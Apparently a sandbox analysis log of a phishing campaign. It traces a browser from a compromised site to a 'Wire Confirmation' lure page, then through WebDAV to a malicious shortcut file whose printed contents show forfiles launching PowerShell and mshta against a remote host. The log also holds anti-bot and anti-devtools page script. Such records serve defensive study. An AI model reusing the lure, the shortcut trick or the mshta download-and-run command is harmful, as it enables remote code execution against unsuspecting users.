                      Apr 16, 2024 16:26:16.800148964 CEST | 181 | OUT
                      Data Ascii: PROPFIND /Wire%20Confirmation HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: 89.23.107.240
                      Apr 16, 2024 16:26:17.017056942 CEST | 683 | IN | HTTP/1.1 207 Multi-Status
                      Content-Type: text/xml; charset=utf-8
                      Date: Tue, 16 Apr 2024 14:26:16 GMT
                      Content-Length: 557
                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/Wire%20Confirmation/</D:href><D:propstat><D:prop><D:resourcetype><D:collection xmlns:D="DAV:"/></D:resourcetype><D:getlastmodified>Sun, 14 Apr 2024 23:02:07 GMT</D:getlastmodified><D:supportedlock><D:lockentry xmlns:D="DAV:"><D:lockscope><D:exclusive/></D:lockscope><D:locktype><D:write/></D:locktype></D:lockentry></D:supportedlock><D:displayname>Wire Confirmation</D:displayname></D:prop><D:status>HTTP/1.1 200 OK</D:status></D:propstat></D:response></D:multistatus>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      4 | 192.168.2.4 | 49756 | 89.23.107.240 | 80 |  |
                      Timestamp | Bytes transferred | Direction | Data
                      Apr 16, 2024 16:26:18.096744061 CEST | 193 | OUT
                      Data Ascii: PROPFIND /Wire%20Confirmation/desktop.ini HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: 89.23.107.240
                      Apr 16, 2024 16:26:18.313426018 CEST | 132 | IN | HTTP/1.1 404 Not Found
                      Date: Tue, 16 Apr 2024 14:26:18 GMT
                      Content-Length: 9
                      Content-Type: text/plain; charset=utf-8
                      Data Raw: 4e 6f 74 20 46 6f 75 6e 64
                      Data Ascii: Not Found


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      5 | 192.168.2.4 | 49757 | 89.23.107.240 | 80 |  |
                      Timestamp | Bytes transferred | Direction | Data
                      Apr 16, 2024 16:26:18.705857992 CEST | 181 | OUT
                      Data Ascii: PROPFIND /Wire%20Confirmation HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: 89.23.107.240
                      Apr 16, 2024 16:26:18.917215109 CEST | 683 | IN | HTTP/1.1 207 Multi-Status
                      Content-Type: text/xml; charset=utf-8
                      Date: Tue, 16 Apr 2024 14:26:18 GMT
                      Content-Length: 557
                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/Wire%20Confirmation/</D:href><D:propstat><D:prop><D:resourcetype><D:collection xmlns:D="DAV:"/></D:resourcetype><D:displayname>Wire Confirmation</D:displayname><D:getlastmodified>Sun, 14 Apr 2024 23:02:07 GMT</D:getlastmodified><D:supportedlock><D:lockentry xmlns:D="DAV:"><D:lockscope><D:exclusive/></D:lockscope><D:locktype><D:write/></D:locktype></D:lockentry></D:supportedlock></D:prop><D:status>HTTP/1.1 200 OK</D:status></D:propstat></D:response></D:multistatus>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      6 | 192.168.2.4 | 49758 | 89.23.107.240 | 80 |  |
                      Timestamp | Bytes transferred | Direction | Data
                      Apr 16, 2024 16:26:19.130564928 CEST | 193 | OUT
                      Data Ascii: PROPFIND /Wire%20Confirmation/desktop.ini HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: 89.23.107.240
                      Apr 16, 2024 16:26:19.342358112 CEST | 132 | IN | HTTP/1.1 404 Not Found
                      Date: Tue, 16 Apr 2024 14:26:19 GMT
                      Content-Length: 9
                      Content-Type: text/plain; charset=utf-8
                      Data Raw: 4e 6f 74 20 46 6f 75 6e 64
                      Data Ascii: Not Found


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      7 | 192.168.2.4 | 49759 | 89.23.107.240 | 80 |  |
                      Timestamp | Bytes transferred | Direction | Data
                      Apr 16, 2024 16:26:19.556150913 CEST | 181 | OUT
                      Data Ascii: PROPFIND /Wire%20Confirmation HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: 89.23.107.240
                      Apr 16, 2024 16:26:19.767590046 CEST | 683 | IN | HTTP/1.1 207 Multi-Status
                      Content-Type: text/xml; charset=utf-8
                      Date: Tue, 16 Apr 2024 14:26:19 GMT
                      Content-Length: 557
                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/Wire%20Confirmation/</D:href><D:propstat><D:prop><D:supportedlock><D:lockentry xmlns:D="DAV:"><D:lockscope><D:exclusive/></D:lockscope><D:locktype><D:write/></D:locktype></D:lockentry></D:supportedlock><D:displayname>Wire Confirmation</D:displayname><D:getlastmodified>Sun, 14 Apr 2024 23:02:07 GMT</D:getlastmodified><D:resourcetype><D:collection xmlns:D="DAV:"/></D:resourcetype></D:prop><D:status>HTTP/1.1 200 OK</D:status></D:propstat></D:response></D:multistatus>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      8 | 192.168.2.4 | 49760 | 89.23.107.240 | 80 |  |
                      Timestamp | Bytes transferred | Direction | Data
                      Apr 16, 2024 16:26:19.988154888 CEST | 181 | OUT
                      Data Ascii: PROPFIND /Wire%20Confirmation HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 1translate: fContent-Length: 0Host: 89.23.107.240
                      Apr 16, 2024 16:26:20.199944019 CEST | 1289 | IN | HTTP/1.1 207 Multi-Status
                      Content-Type: text/xml; charset=utf-8
                      Date: Tue, 16 Apr 2024 14:26:20 GMT
                      Content-Length: 1181
                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/Wire%20Confirmation/</D:href><D:propstat><D:prop><D:resourcetype><D:collection xmlns:D="DAV:"/></D:resourcetype><D:displayname>Wire Confirmation</D:displayname><D:getlastmodified>Sun, 14 Apr 2024 23:02:07 GMT</D:getlastmodified><D:supportedlock><D:lockentry xmlns:D="DAV:"><D:lockscope><D:exclusive/></D:lockscope><D:locktype><D:write/></D:locktype></D:lockentry></D:supportedlock></D:prop><D:status>HTTP/1.1 200 OK</D:status></D:propstat></D:response><D:response><D:href>/Wire%20Confirmation/WireConfirmation.pdf.lnk</D:href><D:propstat><D:prop><D:getetag>"17c647cf50c5e00084a"</D:getetag><D:supportedlock><D:lockentry xmlns:D="DAV:"><D:lockscope><D:exclusive/></D:lockscope><D:locktype><D:write/></D:locktype></D:lockentry></D:supportedlock><D:displayname>WireConfirmation.pdf.lnk</D:displayname><D:getcontentlength>2122</D:getcontentlength><D:getlastmodified>Sun, 14 Apr 2024 23:01:04 GMT</D:getlastmodified><D:getcontenttype>application/octet-stream</D:getcontenttype><D:resourcetype></D:resourcetype></D:prop><D:status>HTTP/1.1 200 OK</D:status></D:propstat></D:respon
                      Apr 16, 2024 16:26:20.199985981 CEST | 19 | IN | Data Raw: 73 65 3e 3c 2f 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 3e
                      Data Ascii: se></D:multistatus>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      9 | 192.168.2.4 | 49761 | 89.23.107.240 | 80 |  |
                      Timestamp | Bytes transferred | Direction | Data
                      Apr 16, 2024 16:26:20.419140100 CEST | 215 | OUT | GET /Wire%20Confirmation/WireConfirmation.pdf.lnk HTTP/1.1
                      Cache-Control: no-cache
                      Connection: Keep-Alive
                      Pragma: no-cache
                      User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045
                      translate: f
                      Host: 89.23.107.240
                      Apr 16, 2024 16:26:20.633470058 CEST | 727 | IN | HTTP/1.1 200 OK
                      Accept-Ranges: bytes
                      Content-Length: 2122
                      Content-Type: application/octet-stream
                      Etag: "17c647cf50c5e00084a"
                      Last-Modified: Sun, 14 Apr 2024 23:01:04 GMT
                      Date: Tue, 16 Apr 2024 14:26:20 GMT
                      Data Ascii: LF@ pVCpVCpVCEPO :i+00/C:\V1XqWindows@R@Xq.^iWindowsZ1X~System32BR@X~.System32f2RA forfiles.exeJRARA.%forfiles.exeO-NvC:\Windows\System32\forfiles.exeWire Confirmat
                      Apr 16, 2024 16:26:20.633620977 CEST | 1289 | IN
                      Data Ascii: ion Receipt&..\..\..\Windows\System32\forfiles.exe|/p C:\Windows\System32 /m calc.exe /c "powershell . mshta http://34.201
                      Apr 16, 2024 16:26:20.633660078 CEST | 321 | IN
                      Data Ascii: ]ND.Q`Xwin-8vf077na1p7N<Ix1@XAe5N<Ix1@XAe51SPSXFL8C&mm-S-1-5-21-254917188-4217226013-2928493570-5


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      10 | 192.168.2.4 | 49762 | 89.23.107.240 | 80 |  |
                      Timestamp | Bytes transferred | Direction | Data
                      Apr 16, 2024 16:26:21.017472029 CEST | 191 | OUT
                      Data Ascii: PROPFIND /Wire%20Confirmation/Thumbs.db HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: 89.23.107.240
                      Apr 16, 2024 16:26:21.231455088 CEST | 132 | IN | HTTP/1.1 404 Not Found
                      Date: Tue, 16 Apr 2024 14:26:21 GMT
                      Content-Length: 9
                      Content-Type: text/plain; charset=utf-8
                      Data Raw: 4e 6f 74 20 46 6f 75 6e 64
                      Data Ascii: Not Found


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      0 | 192.168.2.4 | 49737 | 104.21.39.145 | 443 | 1508 | C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-04-16 14:25:24 UTC | 678 | OUT | GET /van-chuyen-giao-nhan/ HTTP/1.1
                      Host: tragiangoc.com
                      Connection: keep-alive
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: navigate
                      Sec-Fetch-User: ?1
                      Sec-Fetch-Dest: document
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      sec-ch-ua-platform: "Windows"
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-04-16 14:25:24 UTC  629  IN  HTTP/1.1 200 OK
                      Date: Tue, 16 Apr 2024 14:25:24 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Last-Modified: Sun, 14 Apr 2024 23:36:54 GMT
                      Accept-Ranges: bytes
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F24IoALFF%2BpXx1dOEil7pPj1PKoZzXhx47rgNzrrBvDP%2BNxgnNpOtYuKAc6RJM7wKwLx2c6QxJ66g6ASrEoTvuTRpjtl0FI%2BzHg0NnLT58lPaamWckjbSXoAy7IJ0BfylQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 8754d82f79c56745-ATL
                      alt-svc: h3=":443"; ma=86400
                      2024-04-16 14:25:24 UTC  740  IN
                      Data Ascii: 24c9<!DOCTYPE html><html lang="en"><head> <meta name="robots" content="noimageindex, nofollow, nosnippet, noindex, noarchive, nocache, notranslate, noyaca"> <meta http-equiv="Content-Type" content="text/html; charset=us-ascii"> <title
                      2024-04-16 14:25:24 UTC  1369  IN
                      Data Ascii: xecutor", "$wdc_asdjflasutopfhvcZLmcfl_", "__lastWatirAlert", "__lastWatirConfirm", "__lastWatirPrompt", "$chrome_asyncScriptInfo", "$cdc_asdjflasutopfhvcZLmcfl_", "__webdriver_evaluate", "__selenium_evaluate", "__webdriver_script_function", "__webdriver_
                      2024-04-16 14:25:24 UTC  1369  IN
                      Data Ascii: tte", "puppeteer", "Buffer", "_phantom", "__nightmare", "_selenium", "callPhantom", "Cypress", "callSelenium", "_Selenium_IDE_Recorder"]; let documentSearchKeys = ["driver", "webdriver", "marionette", "selenium", "phantom",]; for
                      2024-04-16 14:25:24 UTC  1369  IN
                      Data Ascii: ute"]("webdriver")) return true; if (window["document"]["documentElement"]["getAttribute"]("driver")) return true; if (window["document"]["documentElement"]["getAttribute"]("geckodriver")) return true; if (window["do
                      2024-04-16 14:25:24 UTC  1369  IN
                      Data Ascii: return false } if (e.ctrlKey && e.keyCode === "E".charCodeAt(0)) { return false } if (e.ctrlKey && e.shiftKey && e.keyCode === "I".charCodeAt(0)) { retur
                      2024-04-16 14:25:24 UTC  1369  IN
                      Data Ascii: typeof item !== "string" ? JSON.stringify(item) : item; try { value = JSON.parse(value); return typeof value === "object" && value !== null } catch (e) { return false
                      2024-04-16 14:25:24 UTC  1369  IN
                      Data Ascii: <meta http-equiv='refresh' content='0;url=https://example.com'/> </noscript> <noframes> <meta http-equiv='refresh' content='0;url=https://example.com'/> </noframes></head><body> <script> // encrypt link to base64
                      2024-04-16 14:25:24 UTC  471  IN
                      Data Ascii: ventListener('keydown', (e) => { if (e.ctrlKey && e.key == 'p') { e.cancelBubble = true; e.preventDefault(); e.stopImmediatePropagation(); } }); function Acce
                      2024-04-16 14:25:24 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      1           192.168.2.4  49740        104.18.3.35     443               1508  C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp  Bytes transferred  Direction  Data
                      2024-04-16 14:25:25 UTC  740  OUT  GET /WireConfirmation_2004.10.2024.html HTTP/1.1
                      Host: pub-6d8650014e23489d8c6e14ca9312426a.r2.dev
                      Connection: keep-alive
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      sec-ch-ua-platform: "Windows"
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Sec-Fetch-Site: cross-site
                      Sec-Fetch-Mode: navigate
                      Sec-Fetch-Dest: document
                      Referer: https://tragiangoc.com/
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-04-16 14:25:25 UTC  282  IN  HTTP/1.1 200 OK
                      Date: Tue, 16 Apr 2024 14:25:25 GMT
                      Content-Type: text/html
                      Content-Length: 1435
                      Connection: close
                      Accept-Ranges: bytes
                      ETag: "47114eabb690f96fd59ee4c17dddcde0"
                      Last-Modified: Sun, 14 Apr 2024 23:29:30 GMT
                      Server: cloudflare
                      CF-RAY: 8754d836fa05ad94-ATL
                      2024-04-16 14:25:25 UTC  1087  IN
                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="refresh" content="0; URL=search:query=WireConfirmation.pdf&amp;crumb=location:\\89.23.
                      2024-04-16 14:25:25 UTC  348  IN
                      Data Ascii: irmation\&amp;displayname=Wire Confirmation" > ACCESS HERE TO REVIEW FULL DOCUMENT NOW </a> </p> <p style="font-size: 24px; font-weight: 400;"> Cordialement,<br/> With kind regards,<br/> <b>John


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      2           192.168.2.4  49741        104.18.3.35     443               1508  C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp  Bytes transferred  Direction  Data
                      2024-04-16 14:25:26 UTC  676  OUT  GET /favicon.ico HTTP/1.1
                      Host: pub-6d8650014e23489d8c6e14ca9312426a.r2.dev
                      Connection: keep-alive
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      sec-ch-ua-platform: "Windows"
                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                      Sec-Fetch-Site: same-origin
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: image
                      Referer: https://pub-6d8650014e23489d8c6e14ca9312426a.r2.dev/WireConfirmation_2004.10.2024.html
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-04-16 14:25:26 UTC  180  IN  HTTP/1.1 404 Not Found
                      Date: Tue, 16 Apr 2024 14:25:26 GMT
                      Content-Type: text/html
                      Content-Length: 27242
                      Connection: close
                      Server: cloudflare
                      CF-RAY: 8754d83cb88f6755-ATL
                      2024-04-16 14:25:26 UTC  1189  IN
                      Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <link rel="icon" href="https://www.cloudflare.com/favicon.ico" /> <title>Not Found</title> <sty
                      2024-04-16 14:25:26 UTC  1369  IN
                      Data Ascii: </p> </div> <div> <p id="footer-title">Is this your bucket?</p> <p> Learn how to enable <a href="https://developers.cloudflare.com/r2/data-access/public-buckets/"


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      3           192.168.2.4  49742        184.31.62.93    443
                      Timestamp  Bytes transferred  Direction  Data
                      2024-04-16 14:25:26 UTC  161  OUT  HEAD /fs/windows/config.json HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      Accept-Encoding: identity
                      User-Agent: Microsoft BITS/7.8
                      Host: fs.microsoft.com
                      2024-04-16 14:25:27 UTC  468  IN  HTTP/1.1 200 OK
                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                      Content-Type: application/octet-stream
                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                      Server: ECAcc (chd/079C)
                      X-CID: 11
                      X-Ms-ApiVersion: Distribute 1.2
                      X-Ms-Region: prod-eus2-z1
                      Cache-Control: public, max-age=146333
                      Date: Tue, 16 Apr 2024 14:25:26 GMT
                      Connection: close
                      X-CID: 2


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      4           192.168.2.4  49744        184.31.62.93    443
                      Timestamp  Bytes transferred  Direction  Data
                      2024-04-16 14:25:27 UTC  239  OUT  GET /fs/windows/config.json HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      Accept-Encoding: identity
                      If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                      Range: bytes=0-2147483646
                      User-Agent: Microsoft BITS/7.8
                      Host: fs.microsoft.com
                      2024-04-16 14:25:27 UTC  805  IN  HTTP/1.1 200 OK
                      ApiVersion: Distribute 1.1
                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                      Server: ECAcc (chd/0778)
                      X-CID: 11
                      X-CCC: US
                      X-Azure-Ref-OriginShield: Ref A: 52EA27DBDE0C4533B819423583F6692E Ref B: CH1AA2040902052 Ref C: 2023-07-09T23:10:08Z
                      X-MSEdge-Ref: Ref A: 528BB8D443C042AA9AEA4EC3F75C7762 Ref B: CHI30EDGE0111 Ref C: 2023-07-09T23:11:11Z
                      Content-Type: application/octet-stream
                      X-Azure-Ref: 01uvbYwAAAACkqWtaEMjWQL/4cpisZkorTUVNMzBFREdFMDgxMQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                      Cache-Control: public, max-age=146269
                      Date: Tue, 16 Apr 2024 14:25:27 GMT
                      Content-Length: 55
                      Connection: close
                      X-CID: 2
                      2024-04-16 14:25:27 UTC  55  IN  Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                      Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      5           192.168.2.4  49745        20.114.59.183   443
                      Timestamp  Bytes transferred  Direction  Data
                      2024-04-16 14:25:39 UTC  306  OUT  GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=oDpGcPGGdcbSnd9&MD=hxMSsSOB HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                      Host: slscr.update.microsoft.com
                      2024-04-16 14:25:39 UTC  560  IN  HTTP/1.1 200 OK
                      Cache-Control: no-cache
                      Pragma: no-cache
                      Content-Type: application/octet-stream
                      Expires: -1
                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                      ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                      MS-CorrelationId: e3a6285e-1a30-4714-976d-2732037bfeb5
                      MS-RequestId: fb9a9ae4-2a58-483f-a4b1-e5e435041fb6
                      MS-CV: oUOXW6yDNky49/i6.0
                      X-Microsoft-SLSClientCache: 2880
                      Content-Disposition: attachment; filename=environment.cab
                      X-Content-Type-Options: nosniff
                      Date: Tue, 16 Apr 2024 14:25:38 GMT
                      Connection: close
                      Content-Length: 24490


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      6 | 192.168.2.4 | 49754 | 20.114.59.183 | 443 | |
                      Timestamp | Bytes transferred | Direction | Data
                      2024-04-16 14:26:16 UTC | 306 | OUT | GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=oDpGcPGGdcbSnd9&MD=hxMSsSOB HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                      Host: slscr.update.microsoft.com
                      2024-04-16 14:26:17 UTC | 560 | IN | HTTP/1.1 200 OK
                      Cache-Control: no-cache
                      Pragma: no-cache
                      Content-Type: application/octet-stream
                      Expires: -1
                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                      ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                      MS-CorrelationId: e39d8fb8-3e2b-492c-b369-05a0b4a626b8
                      MS-RequestId: 42e3c0d1-21f2-427b-9f18-18a2fc436ac7
                      MS-CV: zNGT/ivCVEa+OLwg.0
                      X-Microsoft-SLSClientCache: 2160
                      Content-Disposition: attachment; filename=environment.cab
                      X-Content-Type-Options: nosniff
                      Date: Tue, 16 Apr 2024 14:26:16 GMT
                      Connection: close
                      Content-Length: 25457


                      Target ID:0
                      Start time:16:25:19
                      Start date:16/04/2024
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                      Imagebase:0x7ff76e190000
                      File size:3'242'272 bytes
                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:false

                      Target ID:2
                      Start time:16:25:20
                      Start date:16/04/2024
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1996,i,915152715888252964,5619724167490245158,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Imagebase:0x7ff76e190000
                      File size:3'242'272 bytes
                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:false

                      Target ID:3
                      Start time:16:25:22
                      Start date:16/04/2024
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.bing.com/ck/a?!&&p=ec2690ecb5e8783cJmltdHM9MTcxMzA1MjgwMCZpZ3VpZD0zNmI1MjYyNC1hNGNjLTZiMzktMTE1Yi0zNjI3YTBjYzY1YmEmaW5zaWQ9NTIzMA&ptn=3&ver=2&hsh=3&fclid=36b52624-a4cc-6b39-115b-3627a0cc65ba&psq=site%3atragiangoc.com&u=a1aHR0cDovL3RyYWdpYW5nb2MuY29tL3Zhbi1jaHV5ZW4tZ2lhby1uaGFuLw"
                      Imagebase:0x7ff76e190000
                      File size:3'242'272 bytes
                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      No disassembly